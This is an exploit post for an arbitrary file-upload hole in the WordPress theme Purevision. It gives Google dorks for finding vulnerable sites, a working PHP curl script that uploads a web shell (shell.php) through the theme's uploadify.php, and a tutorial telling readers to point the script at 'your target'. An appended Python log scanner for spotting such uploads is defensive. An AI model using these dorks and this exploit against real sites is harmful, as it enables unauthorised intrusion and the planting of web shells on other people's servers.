Exploit title: WordPress Themes Purevision File Upload Vulnerability
Dork: inurl:/wp-content/themes/purevision
inurl:/wp-content/themes/purevision intext:index of
Index of /wp-content/themes/purevision/
Requirements:
- XAMPP: Download
Exploit:
<?php
$uploadfile="shell.php";
$ch = curl_init("http://example.com/wp-content/themes/purevision/scripts/admin/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/themes/purevision/scripts/admin/uploadify/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Tutorial:
- Open XAMPP and start Apache and MySQL
- Edit the exploit above,
replace example.com with your target's link
- Save the exploit in C: > xampp > php with the .php extension
- Run the exploit from cmd; the command is php exploit.php, then press Enter
If the number 1 is printed, the exploit succeeded or the target is vulnerable
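On the server side, the request made by the exploit above shows up in the web server access log. The following is an added example, not part of the original post: it scans combined-format log lines for POSTs to the theme's uploadify.php and for PHP files later served from the same directory (the `folder` value used above). The function name and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Directory and script targeted by the exploit on this page.
UPLOAD_DIR = "/wp-content/themes/purevision/scripts/admin/uploadify/"
UPLOADER = UPLOAD_DIR + "uploadify.php"

# Combined log format: ip - - [time] "METHOD path proto" status size ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample lines (documentation IP ranges, made-up timestamps).
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Mar/2014:10:01:02 +0000] "GET /wp-content/themes/purevision/ HTTP/1.1" 200 1532 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [12/Mar/2014:10:01:09 +0000] "POST ' + UPLOADER + ' HTTP/1.1" 200 1 "-" "-"',
    '203.0.113.7 - - [12/Mar/2014:10:01:15 +0000] "GET ' + UPLOAD_DIR + 'shell.php HTTP/1.1" 200 412 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [12/Mar/2014:10:05:00 +0000] "POST ' + UPLOADER + ' HTTP/1.1" 404 210 "-" "-"',
]

def find_upload_abuse(lines):
    """Return (kind, ip, time, path) findings in log order."""
    findings, accepted = [], False
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line
        path = unquote(m["path"].split("?", 1)[0]).lower()
        status = int(m["status"])
        if not path.startswith(UPLOAD_DIR):
            continue
        if path == UPLOADER and m["method"] == "POST":
            # A 200 means the upload script ran; anything else is an attempt.
            kind = "upload_accepted" if status == 200 else "upload_attempt"
            accepted = accepted or status == 200
        elif path.endswith(".php") and path != UPLOADER and status == 200:
            # A PHP file other than the uploader was served from the upload directory.
            kind = "script_after_upload" if accepted else "script_in_upload_dir"
        else:
            continue
        findings.append((kind, m["ip"], m["time"], path))
    return findings

if __name__ == "__main__":
    for finding in find_upload_abuse(SAMPLE_LOG):
        print(*finding, sep="\t")
```

Any finding means the uploadify directory should be compared against a clean copy of the theme for files that do not belong to it.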